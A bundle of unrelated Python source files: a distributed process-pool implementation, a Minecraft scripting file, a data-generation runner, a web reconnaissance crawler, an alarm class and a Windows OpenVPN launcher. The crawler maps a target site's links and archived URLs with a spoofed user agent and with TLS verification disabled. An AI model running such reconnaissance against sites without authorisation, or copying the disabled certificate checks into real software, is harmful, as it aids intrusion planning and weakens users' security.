:returns: an iterator which user can use to get results.
"""
res = self.map_async(func, iterable, chunksize)
return res.iget_ordered()
def imap_unordered(self, func, iterable, chunksize=1):
"""
For each element `e` in `iterable`, run `func(e)`. The workload is
distributed between all the Pool workers. This function returns an
**unordered** iterator which user and iterate over to get results.
This means that the order of the results may not match the order of
the `iterable`.
:param func: target function to run.
:param iterable: an iterable object to be mapped.
:param chunksize: if set, elements in `iterable` will be put in to
chunks whose size is decided by `chunksize`. These chunks will be
sent to Pool workers instead of each elements in `iterable`. If not
set, the chunksize is decided automatically.
:returns: an unordered iterator which user can use to get results.
"""
res = self.map_async(func, iterable, chunksize)
return res.iget_unordered()
def starmap_async(self, func, iterable, chunksize=None, callback=None,
error_callback=None):
"""
For each element `args` in `iterable`, run `func(*args)`. The workload
is distributed between all the Pool workers. This is an asynchronous
version of `starmap`.
For example, `starmap_async(func, [(1, 2, 3), (4, 5, 6)])` will result
in calling `func(1, 2, 3)` and `func(4, 5, 6)` on a remote host.
:param func: target function to run.
:param iterable: an iterable object to be mapped.
:param chunksize: if set, elements in `iterable` will be put in to
chunks whose size is decided by `chunksize`. These chunks will be
sent to Pool workers instead of each elements in `iterable`. If not
set, the chunksize is decided automatically.
:param callback: Currently not supported. A callback function that will
be called when the result is ready.
:param error_callback: Currently not supported. A callback function
that will be called when an error occurred.
:returns: An MapResult object which has a method `.get()` to get
the actual results.
"""
if self._state != RUN:
raise ValueError("Pool is not running")
if chunksize is None:
chunksize = 32
if not hasattr(iterable, '__len__'):
iterable = list(iterable)
self.lazy_start_workers(func)
seq = self._inventory.add(len(iterable))
chunks = self.__class__._chunks(iterable, chunksize)
for batch, chunk in enumerate(chunks):
self._task_put((seq, batch * chunksize, func, (chunk, ), True))
res = MapResult(seq, self._inventory)
return res
def starmap(self, func, iterable, chunksize=None):
"""
For each element `args` in `iterable`, run `func(*args)`. The workload
is distributed between all the Pool workers.
For example, `starmap_async(func, [(1, 2, 3), (4, 5, 6)])` will result
in calling `func(1, 2, 3)` and `func(4, 5, 6)` on a remote host.
:param func: target function to run.
:param iterable: an iterable object to be mapped.
:param chunksize: if set, elements in `iterable` will be put in to
chunks whose size is decided by `chunksize`. These chunks will be
sent to Pool workers instead of each elements in `iterable`. If not
set, the chunksize is decided automatically.
:param callback: Currently not supported. A callback function that will
be called when the result is ready.
:param error_callback: Currently not supported. A callback function
that will be called when an error occurred.
:returns: A list of results equivalent to calling
`[func(*arg) for arg in iterable]`
"""
return self.starmap_async(func, iterable, chunksize).get()
def _send_sentinels_to_workers(self):
logger.debug('send sentinels(None) to workers %s', self)
for i in range(self._processes):
self._task_put(None)
def close(self):
"""
Close this Pool. This means the current pool will be put in to a
closing state and it will not accept new tasks. Existing workers will
continue to work on tasks that have been dispatched to them and exit
when all the tasks are done.
"""
logger.debug('closing pool %s', self)
if self._state == RUN:
self._state = CLOSE
self._worker_handler._state = CLOSE
for p in self._pool:
if hasattr(p, '_sentinel'):
p._state = CLOSE
self._send_sentinels_to_workers()
def terminate(self):
"""
Terminate this pool. This means that this pool will be terminated and
all its pool workers will also be terminated. Task that have been
dispatched will be discarded.
"""
logger.debug('terminating pool %s', self)
logger.debug('set pool._worker_handler.status = TERMINATE')
self._worker_handler._state = TERMINATE
self._state = TERMINATE
for p in self._pool:
p._state = TERMINATE
pool = self._pool
N = min(100, len(pool))
# Thread pool used for process termination. With randomized delay, this
# roughly equals N requests per second.
tpool = ThreadPool(N)
# Terminate workers which haven't already finished.
if pool and hasattr(pool[0], 'terminate'):
logger.debug('terminating workers')
# tpool.map_async(safe_terminate_worker, pool)
tpool.map(safe_terminate_worker, pool)
if pool and hasattr(pool[0], 'terminate'):
logger.debug("joining pool workers, this may take some "
"time. workers: %s", pool)
tpool.map(safe_join_worker, pool)
logger.debug("joining pool._worker_handler")
self._worker_handler.join()
def join(self):
"""
Wait for all the pool workers of this pool to exit. This should be
used after `terminate()` or `close()` are called on this pool.
"""
logger.debug('%s.join()', self)
assert self._state in (TERMINATE, CLOSE)
for p in self._pool:
if p._state not in (TERMINATE, CLOSE):
logger.debug("%s.join() ignore newly connected Process %s",
self, p)
continue
p.join()
def wait_until_workers_up(self):
logger.debug('%s begin wait_until_workers_up', self)
workers_per_fp = config.cpu_per_job
n = math.ceil(float(self._processes) / workers_per_fp)
while len(self._pool) < n:
logger.debug("%s waiting for all workers to be up, expected %s, "
"got %s", self, n, self._pool)
time.sleep(0.5)
for p in self._pool:
logger.debug('%s waiting for _sentinel %s', self, p)
while not hasattr(p, '_sentinel') or p._sentinel is None:
time.sleep(0.5)
# now all the worker has connected to the master, wait
# for some additional time to be sure.
time.sleep(1)
logger.debug('%s wait_until_workers_up done', self)
class ResilientZPool(ZPool):
"""
ZPool with error handling. The differences are:
* Master socket is a ROUTER socket instead of DEALER socket.
* Add pending table.
* When an died worker is detected, it's jobs are resubmitted to work Q
in addition to restarting that worker.
The API of `ResilientZPool` is the same as `ZPool`.
"""
def __init__(self, processes=None, initializer=None, initargs=(),
maxtasksperchild=None, cluster=None):
self.active_peer_dict = {}
self.active_peer_list = []
self.peer_lock = threading.Lock()
self.taskq = queue.Queue()
self._pending_table = {}
super(ResilientZPool, self).__init__(
processes=processes,
initializer=initializer,
initargs=initargs,
maxtasksperchild=maxtasksperchild,
cluster=cluster,
master_sock_type="rep")
'''
# launch task handler
td = threading.Thread(
target=self._handle_tasks,
args=(
self.taskq,
self._master_sock,
self.active_peer_list,
self._pending_table,
))
td.daemon = True
td._state = RUN
td.start()
self._task_handler = td
'''
self._pid_to_rid = {}
def _add_peer(self, ident):
self.peer_lock.acquire()
self.active_peer_dict[ident] = True
self._pending_table[ident] = {}
self.active_peer_list.append(ident)
self.peer_lock.release()
def _remove_peer(self, ident):
# _pendint_table will be cleared later in error handling phase
self.peer_lock.acquire()
del self.active_peer_dict[ident]
self.active_peer_list.remove(ident)
self.peer_lock.release()
def _res_get(self):
# check for system messages
payload = self._result_sock.recv()
data = pickle.loads(payload)
# remove item from pending table
seq, batch, i, result, ident = data
# seq, batch, func, chunks, is_starmap
task = self._pending_table[ident][(seq, batch)]
chunksize = len(task[3])
if i == batch + chunksize - 1:
# this batch has been processed, remove this item from pending
# table
del self._pending_table[ident][(seq, batch)]
# skip ident
return data[:-1]
def _task_put(self, task):
self.taskq.put(task)
def _handle_tasks(self):
thread = threading.current_thread()
taskq = self.taskq
master_sock = self._master_sock
pending_table = self._pending_table
while thread._state == RUN:
task = taskq.get()
if task is None:
logger.debug("_handle_tasks got sentinel")
break
msg = master_sock.recv()
ident, pid = struct.unpack("4si", msg)
# add peer
if not self.active_peer_dict.get(ident, None):
logger.debug('ResilientZPool got REG %s', msg)
self._add_peer(ident)
self._pid_to_rid[pid] = ident
data = pickle.dumps(task)
seq, batch, func, arg_list, starmap = task
# use (seq, batch) to identify a (chunked) task. batch is the start
# number of that batch.
pending_table[ident][(seq, batch)] = task
master_sock.send(data)
# tell peers to exit
data = pickle.dumps(None)
#print("send sentinals to workers, active peers", self.active_peer_list)
for i in range(len(self._pool)):
#print("waiting for requests")
msg = master_sock.recv()
#print("got ", msg)
master_sock.send(data)
#print("send ", data)
#print("exiting handle_tasks ")
logger.debug('ResilientZPool _handle_tasks exited')
@staticmethod
def _maintain_workers(processes, workers, master_addr, result_addr, initializer,
initargs, maxtasksperchild):
thread = threading.current_thread()
workers_per_fp = config.cpu_per_job
left = processes - len(workers)
logger.debug("ResilientZPool _maintain_workers running, workers %s",
workers)
threads = []
while left > 0 and thread._state == RUN:
if left > workers_per_fp:
n = workers_per_fp
else:
n = left
master_conn = LazyZConnection(("req", master_addr))
result_conn = LazyZConnection(("w", result_addr))
#conn = LazyZConnectionReg(("req", master_addr))
master_conn.set_name("master_conn")
w = fiber.process.Process(target=zpool_worker,
args=(master_conn,
result_conn,
initializer,
initargs,
maxtasksperchild,
False,
n,
True),
daemon=False)
w.name = w.name.replace("Process", "PoolWorker")
td = threading.Thread(target=safe_start, args=(w,))
td.start()
threads.append(td)
logger.debug("started safe_start thread %s", td)
# w.start()
logger.debug("started proc %s", w)
workers.append(w)
left -= n
for td in threads:
logger.debug("joining safe_start thread %s", td)
td.join(2)
logger.debug("joining safe_start thread %s finished", td)
logger.debug("ResilientZPool _maintain_workers finished, workers %s",
workers)
@staticmethod
def _handle_workers(pool):
logger.debug("%s _handle_workers running", pool)
td = threading.current_thread()
ResilientZPool._maintain_workers(
pool._processes, pool._pool,
pool._master_addr, pool._result_addr, pool._initializer,
pool._initargs, pool._maxtasksperchild
)
while td._state == RUN:
exited_workers = ResilientZPool._join_exited_workers(pool._pool)
if len(exited_workers) > 0:
# create new workers when old workers exited
logger.debug("Exited workers %s", exited_workers)
ResilientZPool._maintain_workers(
pool._processes, pool._pool,
pool._master_addr, pool._result_addr, pool._initializer,
pool._initargs, pool._maxtasksperchild
)
# resubmit tasks
logger.debug("Resubmitting tasks from failed workers")
for worker in exited_workers:
rid = pool._pid_to_rid[worker.pid]
# remove rid from active peers
pool._remove_peer(rid)
# Take care of pending tasks
tasks = pool._pending_table[rid]
logger.debug("Failed worker %s tasks %s", worker, tasks)
for _, task in tasks.items():
# resubmit each task
pool._task_put(task)
logger.debug("Resubmit task %s", task)
# Remove tasks from pending table
del pool._pending_table[rid]
logger.debug("Remove rid %s from pending table", rid)
time.sleep(0.5)
logger.debug("%s _handle_workers finished. Status is not RUN",
pool)
def terminate(self):
self._task_handler._state = TERMINATE
super(ResilientZPool, self).terminate()
def close(self):
logger.debug('closing pool %s', self)
if self._state == RUN:
self._state = CLOSE
self._worker_handler._state = CLOSE
for p in self._pool:
if hasattr(p, '_sentinel'):
p._state = CLOSE
#self._send_sentinels_to_workers()
#logger.debug("ResilientZPool _send_sentinels_to_workers: "
# "send to task handler")
self._task_put(None)
self._task_handler._state = CLOSE
def _send_sentinels_to_workers(self):
logger.debug("ResilientZPool _send_sentinels_to_workers: "
"send to workers")
data = pickle.dumps(None)
for ident in self.active_peer_list:
self._master_sock.send_multipart([ident, b"", data])
#Pool = ZPool
Pool = ResilientZPool
|
before.py
|
import random
import subprocess
import time
from threading import Condition, Event, Thread
try:
from psonic import *
#from mcpi import block as block
except:
pass
BlocksList = [1,2,3,4,5,7,12,13,14,15,16,17,18,20,21,22,24,41,42,45,46,47,49]
WoolList = [1,2,3,4,5,6,7,8,9,10,11,12,13,14,15]
def PixelArt(N1,N2,N3,N4,N5,N6,N7,N8,
N9,N10,N11,N12,N13,N14,N15,N16,
N17,N18,N19,N20,N21,N22,N23,N24,
N25,N26,N27,N28,N29,N30,N31,N32,
N33,N34,N35,N36,N37,N38,N39,N40,
N41,N42,N43,N44,N45,N46,N47,N48,
N49,N50,N51,N52,N53,N54,N55,N56,
N57,N58,N59,N60,N61,N62,N63,N64):
row0 = [N1,N2,N3,N4,N5,N6,N7,N8]#1-8
row1 = [N9,N10,N11,N12,N13,N14,N15,N16]
row2 = [N17,N18,N19,N20,N21,N22,N23,N24]
row3 = [N25,N26,N27,N28,N29,N30,N31,N32]
row4 = [N33,N34,N35,N36,N37,N38,N39,N40]
row5 = [N41,N42,N43,N44,N45,N46,N47,N48]
row6 = [N49,N50,N51,N52,N53,N54,N55,N56]
row7 = [N57,N58,N59,N60,N61,N62,N63,N64]
List = [row7,row6,row5,row4,row3,row2,row1,row0]
return List
def PrintWall(ImportedList):
pos = mc.player.getTilePos()
mc.player.setPos(pos.x,pos.y,pos.z)
myList = ImportedList
for row in range (0,8):
for column in range (0,8):
mc.setBlock(pos.x+column,pos.y+row,pos.z-20,myList[row][column])
def distance_to_player(x, y, z):
global mc, math
pp = mc.player.getPos()
xd = x - pp.x
yd = y - pp.y
zd = z - pp.z
return math.sqrt((xd * xd) + (yd * yd) + (zd * zd))
def live_loop_1():
pass
def live_loop_2():
pass
def live_loop_3():
pass
def live_loop_4():
pass
def live_loop_1a(condition,stop_event):
while not stop_event.is_set():
with condition:
condition.notifyAll() #Message to threads
live_loop_1()
def live_loop_2a(condition,stop_event):
while not stop_event.is_set():
with condition:
condition.wait() #Wait for message
live_loop_2()
def live_loop_3a(condition,stop_event):
while not stop_event.is_set():
with condition:
condition.wait() #Wait for message
live_loop_3()
def live_loop_4a(condition,stop_event):
while not stop_event.is_set():
with condition:
condition.wait() #Wait for message
live_loop_4()
condition = Condition()
stop_event = Event()
live_thread_1 = Thread(name='producer', target=live_loop_1a, args=(condition,stop_event))
live_thread_2 = Thread(name='consumer1', target=live_loop_2a, args=(condition,stop_event))
live_thread_3 = Thread(name='consumer2', target=live_loop_3a, args=(condition,stop_event))
live_thread_4 = Thread(name='consumer3', target=live_loop_4a, args=(condition,stop_event))
# live_thread_1.start()
# live_thread_2.start()
# live_thread_3.start()
# live_thread_4.start()
def buildPumpkin(x, y, z):
mc.setBlocks(x-2, y-2, z-2, x+2, y+2, z+2, 35, 1)
mc.setBlocks(x-1, y-1, z-1, x+1, y+1, z+1, 0, 1)
mc.setBlock(x-1, y+1, z-2, 0)
mc.setBlock(x+1, y+1, z-2, 0)
mc.setBlocks(x+1, y-1, z-2, x-1, y-1, z-2, 0, 0)
mc.setBlock(x-1, y+1, z+2, 0)
mc.setBlock(x+1, y+1, z+2, 0)
mc.setBlocks(x+1, y-1, z+2, x-1, y-1, z+2, 0, 0)
mc.setBlock(x-2, y+1, z-1, 0)
mc.setBlock(x-2, y+1, z+1, 0)
mc.setBlocks(x-2, y-1, z+1, x-2, y-1, z-1, 0, 0)
mc.setBlock(x+2, y+1, z-1, 0)
mc.setBlock(x+2, y+1, z+1, 0)
mc.setBlocks(x+2, y-1, z+1, x+2, y-1, z-1, 0, 0)
mc.setBlock(x, y+3, z, 35, 5)
old_print = print
# Overload print so that we can't hammer the standard output.
# Print is limited to 1 line every 1/10 seconds.
def print(*args):
old_print(*args)
time.sleep(0.10)
print()
print('[Starting]')
print()
|
run_new.py
|
# -*- coding: utf-8 -*-
# @Time : 2020/5/8 10:43
# @Author : liudongyang
# @FileName: run_new.py
# @Software: PyCharm
import sys
import os
import time
import zipfile
import datetime
from readConfig import RunConfig, Setting
config = RunConfig()
settings = Setting()
from task_schedule import main1, main8, main9
from loggers import LogInfo
loginfo = LogInfo()
log = loginfo.logger("DEBUG")
if sys.platform == 'linux':
os.chdir('/home/admin/make_data/tomysql/4v0')
zip_floder = config.get_linux_data_path()
if not os.path.exists(zip_floder):
os.makedirs(zip_floder, exist_ok=False)
elif sys.platform == 'win32':
zip_floder = config.get_win_data_path()
if not os.path.exists(zip_floder):
os.makedirs(zip_floder, exist_ok=False)
else:
zip_floder=os.getcwd()
current_path = os.getcwd()
def get_parm():
with open(os.path.join(current_path, 'parm.txt'), 'r', encoding='utf-8') as f:
res = f.read()
parm = res.split(',')
n = int(parm[0])
t = int(parm[1])
print('开始序号{}'.format(n))
print('parm文件交易日期{}'.format(t))
return n, t
def updtae_parm(n, t):
with open(os.path.join(current_path, 'parm.txt'), 'w', encoding='utf-8') as f:
f.write("{},{}".format(n, t))
def zip_file(start_dir, date):
os.chdir(start_dir)
start_dir = start_dir # 要压缩的文件夹路径
file_news = '{}'.format(date) + '_1.zip' # 压缩后文件夹的名字
print(file_news)
z = zipfile.ZipFile(file_news, 'w', zipfile.ZIP_DEFLATED)
for dir_path, dir_names, file_names in os.walk(start_dir):
f_path = dir_path.replace(start_dir, '') # 这一句很重要,不replace的话,就从根目录开始复制
f_path = f_path and f_path + os.sep or '' # 实现当前文件夹以及包含的所有文件的压缩
# print('f_path', f_path)
for filename in file_names:
if date in filename and filename[-3:] == 'csv':
# print(filename)
z.write(os.path.join(dir_path, filename), f_path + filename)
# print('tt', os.path.join(dir_path, filename), f_path + filename)
os.remove(filename)
else:
print('-----------------')
print(filename)
z.close()
with open(os.path.join(start_dir,'{}'.format(date))+"_1.txt", 'w', encoding='utf-8') as f:
pass
return file_news
def run1():
n, t = get_parm()
start_time = time.time()
# threads = []
# for count in range(10):
# t = Thread(target=main, args=(count*10, (count+1)*10))
# t.start()
# threads.append(t)
# for t in threads:
# t.join()
# -------------------------单线程
# 数据条数
o = int(settings.data_num())
stif_num = int(settings.stif_num())
num_days = int(settings.num_days())
for m in range(num_days):
st = datetime.datetime.strptime(str(t), "%Y%m%d")
file_date_time = str(st)[:10]
stif_time = "{}100000".format(t)
main1(n, n + o, stif_time, file_date_time, stif_num)
# te()
n += o
t += 1
zip_file(zip_floder, file_date_time)
updtae_parm(n, t)
end_time = time.time()
print(end_time - start_time) # 13
def run2():
n, t = get_parm()
start_time = time.time()
# threads = []
# for count in range(10):
# t = Thread(target=main, args=(count*10, (count+1)*10))
# t.start()
# threads.append(t)
# for t in threads:
# t.join()
# -------------------------单线程
# o数据条数
o = int(settings.data_num())
stif_num = int(settings.stif_num())
num_days = int(settings.num_days())
for m in range(num_days):
st = datetime.datetime.strptime(str(t), "%Y%m%d")
file_date_time = str(st)[:10]
stif_time = "{}100000".format(t)
main8(n, n + o, stif_time, file_date_time, stif_num)
n += o
t += 1
zip_file(zip_floder, file_date_time)
end_time = time.time()
print(end_time - start_time) # 13
updtae_parm(n, t)
if __name__ == "__main__":
run1()
# run2()
|
crawler.py
|
#!/usr/bin/env python3
import os
import re
import bs4
import lxml
import asyncio
import requests
import threading
import tldextract
from datetime import date
requests.packages.urllib3.disable_warnings()
R = '\033[31m' # red
G = '\033[32m' # green
C = '\033[36m' # cyan
W = '\033[0m' # white
Y = '\033[33m' # yellow
user_agent = {
'User-Agent' : 'Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0'
}
soup = ''
r_url = ''
sm_url = ''
total = []
r_total = []
sm_total = []
js_total = []
css_total = []
int_total = []
ext_total = []
img_total = []
js_crawl_total = []
sm_crawl_total = []
wayback_total = []
def crawler(target, output, data):
global soup, r_url, sm_url
print('\n\n' + Y + '[!]' + Y + ' Starting Crawler...' + W + '\n')
try:
rqst = requests.get(target, headers=user_agent, verify=False)
except Exception as e:
print(R + '[-] Exception : ' + C + str(e) + W)
exit()
sc = rqst.status_code
if sc == 200:
page = rqst.content
soup = bs4.BeautifulSoup(page, 'lxml')
ext = tldextract.extract(target)
hostname = '.'.join(part for part in ext if part)
protocol = target.split('://')
protocol = protocol[0]
r_url = protocol + '://' + hostname + '/robots.txt'
sm_url = protocol + '://' + hostname + '/sitemap.xml'
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
tasks = asyncio.gather(
robots(target),
sitemap(),
css(target),
js(target),
internal_links(target),
external_links(target),
images(target),
sm_crawl(),
js_crawl(),
wayback(target))
loop.run_until_complete(tasks)
loop.close()
out(target, output, data)
else:
print (R + '[-]' + C + ' Status : ' + W + str(sc))
def url_filter(target):
global url
if all([url.startswith('/') == True, url.startswith('//') == False]):
url = target + url
else:
pass
if all([url.find('http://') == -1,
url.find('https://') == -1]):
url = url.replace('//', 'http://')
url = url.replace('../', target + '/')
url = url.replace('./', target + '/')
else:
pass
if all([url.find('//') == -1,
url.find('../') == -1,
url.find('./') == -1,
url.find('http://') == -1,
url.find('https://') == -1]):
url = target + '/' + url
else:
pass
async def wayback(target):
global wayback_total
print(Y + '[!]' + C + ' Requesting Wayback Machine' + W, end = '')
ext = tldextract.extract(target)
domain = ext.registered_domain
domain = domain + '/*'
#today = date.today().strftime("%Y%m%d")
#past = date.today() + relativedelta(months=-6)
#past = past.strftime("%Y%m%d")
curr_yr = date.today().year
last_yr = curr_yr - 1
wm_url = 'http://web.archive.org/cdx/search/cdx'
data= {
'url': domain,
'fl': 'original',
'fastLatest': 'true',
'from': '{}'.format(str(last_yr)),
'to': '{}'.format(str(curr_yr)),
'filter': 'statuscode:200'
}
try:
r = requests.get(wm_url, params=data)
r_sc = r.status_code
if r_sc == 200:
r_data = r.text
if len(r_data) != 0:
r_data = r_data.split('\n')
r_data = set(r_data)
print(G + '['.rjust(5, '.') + ' {} ]'.format(str(len(r_data))))
wayback_total.extend(r_data)
else:
print(R + '['.rjust(5, '.') + ' Not Found ]' + W)
else:
print(R + '['.rjust(5, '.') + ' {} ]'.format(r_sc) + W)
except Exception as e:
print('\n' + R + '[-] Exception : ' + C + str(e) + W)
async def robots(target):
global url, r_url, r_total
print(G + '[+]' + C + ' Looking for robots.txt' + W, end = '')
try:
r_rqst = requests.get(r_url, headers=user_agent, verify=False)
r_sc = r_rqst.status_code
if r_sc == 200:
print(G + '['.rjust(9, '.') + ' Found ]' + W)
print(G + '[+]' + C + ' Extracting robots Links', end = '')
r_page = r_rqst.text
r_scrape = r_page.split('\n')
for entry in r_scrape:
if (entry.find('Disallow') == 0 or
entry.find('Allow') == 0 or
entry.find('Sitemap') == 0):
url = entry.split(': ')
try:
url = url[1]
url = url.strip()
url_filter(target)
r_total.append(url)
if url.endswith('xml') == True:
sm_total.append(url)
except:
pass
r_total = set(r_total)
print(G + '['.rjust(8, '.') + ' {} ]'.format(str(len(r_total))))
elif r_sc == 404:
print(R + '['.rjust(9, '.') + ' Not Found ]' + W)
else:
print(R + '['.rjust(9, '.') + ' {} ]'.format(r_sc) + W)
except Exception as e:
print('\n' + R + '[-] Exception : ' + C + str(e) + W)
async def sitemap():
global url, sm_url, total, sm_total
print(G + '[+]' + C + ' Looking for sitemap.xml' + W, end = '')
try:
sm_rqst = requests.get(sm_url, headers=user_agent, verify=False)
sm_sc = sm_rqst.status_code
if sm_sc == 200:
print(G + '['.rjust(8, '.') + ' Found ]' + W)
print(G + '[+]' + C + ' Extracting sitemap Links', end = '')
sm_page = sm_rqst.content
sm_soup = bs4.BeautifulSoup(sm_page, 'xml')
links = sm_soup.find_all('loc')
for url in links:
url = url.get_text()
if url != None:
sm_total.append(url)
sm_total = set(sm_total)
print(G + '['.rjust(7, '.') + ' {} ]'.format(str(len(sm_total))))
elif sm_sc == 404:
print(R + '['.rjust(8, '.') + ' Not Found ]' + W)
else:
print(R + '['.rjust(8, '.') + ' {} ]'.format(sm_sc) + W)
except Exception as e:
print('\n' + R + '[-] Exception : ' + C + str(e))
async def css(target):
global url, soup, total, css_total
print(G + '[+]' + C + ' Extracting CSS Links' + W, end = '')
css = soup.find_all('link')
for link in css:
url = link.get('href')
if url != None and '.css' in url:
url_filter(target)
css_total.append(url)
css_total = set(css_total)
print(G + '['.rjust(11, '.') + ' {} ]'.format(str(len(css_total))) + W)
async def js(target):
global url, total, js_total
print(G + '[+]' + C + ' Extracting Javascript Links' + W, end = '')
js = soup.find_all('script')
for link in js:
url = link.get('src')
if url != None and '.js' in url:
url_filter(target)
js_total.append(url)
js_total = set(js_total)
print(G + '['.rjust(4, '.') + ' {} ]'.format(str(len(js_total))))
async def internal_links(target):
global total, int_total
print(G + '[+]' + C + ' Extracting Internal Links' + W, end = '')
ext = tldextract.extract(target)
domain = ext.registered_domain
links = soup.find_all('a')
for link in links:
url = link.get('href')
if url != None:
if domain in url:
int_total.append(url)
int_total = set(int_total)
print(G + '['.rjust(6, '.') + ' {} ]'.format(str(len(int_total))))
async def external_links(target):
global total, ext_total
print(G + '[+]' + C + ' Extracting External Links' + W, end = '')
ext = tldextract.extract(target)
domain = ext.registered_domain
links = soup.find_all('a')
for link in links:
url = link.get('href')
if url != None:
if domain not in url and 'http' in url:
ext_total.append(url)
ext_total = set(ext_total)
print(G + '['.rjust(6, '.') + ' {} ]'.format(str(len(ext_total))))
async def images(target):
global url, total, img_total
print(G + '[+]' + C + ' Extracting Images' + W, end = '')
images = soup.find_all('img')
for link in images:
url = link.get('src')
if url != None and len(url) > 1:
url_filter(target)
img_total.append(url)
img_total = set(img_total)
print(G + '['.rjust(14, '.') + ' {} ]'.format(str(len(img_total))))
async def sm_crawl():
global sm_crawl_total
print(G + '[+]' + C + ' Crawling Sitemaps' + W, end = '')
threads = []
def fetch(site_url):
try:
sm_rqst = requests.get(site_url, headers=user_agent, verify=False)
sm_sc = sm_rqst.status_code
if sm_sc == 200:
sm_data = sm_rqst.content.decode()
sm_soup = bs4.BeautifulSoup(sm_data, 'xml')
links = sm_soup.find_all('loc')
for url in links:
url = url.get_text()
if url != None:
sm_crawl_total.append(url)
elif sm_sc == 404:
print(R + '['.rjust(8, '.') + ' Not Found ]' + W)
else:
print(R + '['.rjust(8, '.') + ' {} ]'.format(sm_sc) + W)
except Exception as e:
print('\n' + R + '[-] Exception : ' + C + str(e))
for site_url in sm_total:
if site_url != sm_url:
if site_url.endswith('xml') == True:
t = threading.Thread(target=fetch, args=[site_url])
t.daemon = True
threads.append(t)
t.start()
for thread in threads:
thread.join()
sm_crawl_total = set(sm_crawl_total)
print(G + '['.rjust(14, '.') + ' {} ]'.format(str(len(sm_crawl_total))))
async def js_crawl():
global js_crawl_total
print(G + '[+]' + C + ' Crawling Javascripts' + W, end = '')
threads = []
def fetch(js_url):
try:
js_rqst = requests.get(js_url, headers=user_agent, verify=False)
js_sc = js_rqst.status_code
if js_sc == 200:
js_data = js_rqst.content.decode()
js_data = js_data.split(';')
for line in js_data:
if any(['http://' in line, 'https://' in line]):
found = re.findall(r'\"(http[s]?://.*?)\"', line)
for item in found:
if len(item) > 8:
js_crawl_total.append(item)
except Exception as e:
print('\n' + R + '[-] Exception : ' + C + str(e))
for js_url in js_total:
t = threading.Thread(target=fetch, args=[js_url])
t.daemon = True
threads.append(t)
t.start()
for thread in threads:
thread.join()
js_crawl_total = set(js_crawl_total)
print(G + '['.rjust(11, '.') + ' {} ]'.format(str(len(js_crawl_total))))
def out(target, output, data):
global total
total.extend(r_total)
total.extend(sm_total)
total.extend(css_total)
total.extend(js_total)
total.extend(js_crawl_total)
total.extend(sm_crawl_total)
total.extend(int_total)
total.extend(ext_total)
total.extend(img_total)
total.extend(wayback_total)
total = set(total)
print('\n' + G + '[+]' + C + ' Total Unique Links Extracted : ' + W + str(len(total)))
if output != 'None':
print()
if len(total) != 0:
data['module-Crawler'] = {'Total Unique Links Extracted': str(len(total))}
try:
data['module-Crawler'].update({'Title':soup.title.string})
except AttributeError:
data['module-Crawler'].update({'Title : None'})
data['module-Crawler'].update(
{
'Count ( Robots )': str(len(r_total)),
'Count ( Sitemap )': str(len(sm_total)),
'Count ( CSS )': str(len(css_total)),
'Count ( JS )': str(len(js_total)),
'Count ( Links in JS )': str(len(js_crawl_total)),
'Count ( Links in Sitemaps )': str(len(sm_crawl_total)),
'Count ( Internal )': str(len(int_total)),
'Count ( External )': str(len(ext_total)),
'Count ( Images )': str(len(img_total)),
'count ( Wayback Machine )': str(len(wayback_total)),
'Count ( Total )': str(len(total))
})
if len(r_total) != 0:
data['module-Crawler'].update({'Robots': list(r_total)})
if len(sm_total) != 0:
data['module-Crawler'].update({'Sitemaps': list(sm_total)})
if len(css_total) != 0:
data['module-Crawler'].update({'CSS': list(css_total)})
if len(js_total) != 0:
data['module-Crawler'].update({'Javascripts': list(js_total)})
if len(js_crawl_total) != 0:
data['module-Crawler'].update({'Links inside Javascripts': list(js_crawl_total)})
if len(sm_crawl_total) != 0:
data['module-Crawler'].update({'Links Inside Sitemaps': list(sm_crawl_total)})
if len(int_total) != 0:
data['module-Crawler'].update({'Internal Links': list(int_total)})
if len(ext_total) != 0:
data['module-Crawler'].update({'External Links': list(ext_total)})
if len(img_total) != 0:
data['module-Crawler'].update({'Images': list(img_total)})
if len(wayback_total) != 0:
data['module-Crawler'].update({'Wayback Machine': list(wayback_total)})
|
timeevent.py
|
import datetime
from utilities.date import *
from threading import Thread
class Alarm:
def __init__(self, timeStr, action, periodic=False):
self.time = dayTime(parseTime(timeStr))
self.periodic = periodic
self.action = action
self.over = False
self.thread = None
self.state = "pending"
def check(self, timeNow):
timeNow = dayTime(timeNow)
diff = int((self.time - timeNow).total_seconds())
if 0 > diff and self.state == "pending":
self.state = "active"
#self.thread = Thread(target=self.action, args=(self.finished,))
self.thread = Thread(target=self.action)
self.thread.start()
elif self.state == "active":
pass
if self.thread:
if self.state == "active" and not self.thread.is_alive():
#print "Thread finished"
self.state = "done"
return diff
def finished(self):
#print "callback"
if self.periodic and self.over:
self.over = False
"""
def getTimeStr(self):
return replaceDate(self.time).strftime("%H:%M")
"""
|
openvpn.py
|
import os
import time
import winreg as reg
import subprocess
from pathlib import Path
import sys
from threading import Thread, currentThread
import psutil
import socket
ADAPTER_KEY = r'SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}'
OpenVpnPath = "C:\\Program Files\\OpenVPN\\bin\\openvpn.exe"
ConfigPath = os.environ['USERPROFILE'] + "\\OpenVPN\\config"
ConnectionKey = "SYSTEM\\CurrentControlSet\\Control\\Network\\{4D36E972-E325-11CE-BFC1-08002BE10318}"
### kill a process and it's children (Mouhahaha !!)
def kill(proc_pid):
process = psutil.Process(proc_pid)
try:
for proc in process.children(recursive=True):
proc.kill()
except:
pass
process.kill()
### Get the gateway address of an interface
def getIpAddressGateway(family,interfaceName):
for interface, snics in psutil.net_if_addrs().items():
for snic in snics:
if snic.family == family and interface == interfaceName:
host = snic.address.split(".")
host[-1] = "1"
return ".".join(host)
### Execute the Openvpn command (use in a thread)
def VPNConnect(OpenVpnPath,componentId,TcpConf,UdpConf=None):
if UdpConf is None:
cmd = [OpenVpnPath,"--dev-node", componentId, "--config", TcpConf,"--route-nopull"]
else:
cmd = [OpenVpnPath,"--dev-node", componentId, "--config", TcpConf,"--config",UdpConf,"--route-nopull"]
prog = subprocess.Popen(cmd,stdout=subprocess.PIPE, stdin=subprocess.PIPE, shell=True)
try:
# Get the credentials
fh = open("data/openVPNid.data", "r").read().splitlines()
login = fh[0]
password = fh[1]
except:
return
time.sleep(0.1)
prog.stdin.write(login.encode("utf-8"))
prog.stdin.flush()
time.sleep(0.1)
prog.stdin.write(password.encode("utf-8"))
prog.stdin.close()
t = currentThread()
while True:
line = prog.stdout.readline()
print(line)
